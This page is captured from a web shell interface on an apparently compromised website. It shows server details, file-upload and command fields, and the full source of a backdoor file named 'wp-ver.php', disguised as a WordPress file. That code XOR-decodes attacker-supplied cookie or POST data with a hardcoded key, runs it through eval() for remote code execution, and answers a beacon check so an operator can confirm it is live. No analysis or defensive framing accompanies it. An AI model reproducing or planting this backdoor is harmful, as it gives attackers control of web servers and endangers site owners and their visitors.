403Webshell
Server IP : 217.160.0.15  /  Your IP : 216.73.216.254
Web Server : Apache
System : Linux info 3.0 #1337 SMP Tue Jan 01 00:00:00 CEST 2000 all GNU/Linux
User : u37981780 ( 1696858)
PHP Version : 8.2.32
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /homepages/43/d124547881/htdocs/Wrigglesworths.co.uk/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /homepages/43/d124547881/htdocs/Wrigglesworths.co.uk/wp-ver.php
<?php
@set_time_limit(0);
function shdp($data, $key)
{
    $out_data = "";
    for ($i = 0; $i < strlen($data);) {
        for ($j = 0; $j < strlen($key) && $i < strlen($data); $j++, $i++) {
            $out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
        }
    }
    return $out_data;
}
if (isset($_GET['2035'])) {
    exit(md5('2035'));
}
$temp = array_merge($_COOKIE, $_POST);
foreach ($temp as $data_key => $data) {
    $data = json_decode(shdp(shdp(base64_decode($data), 'd9f165440c7af4ded34afbccacb101ad'), $data_key), true);
    if (isset($data['ak'])) {
        if ($data['a'] == 'i') {
            $i = array('pv' => @phpversion(), 'sv' => '1.0-1',);
            echo @json_encode($i);
        } elseif ($data['a'] == 'e') {
            eval($data['d']);
        }
        exit();
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit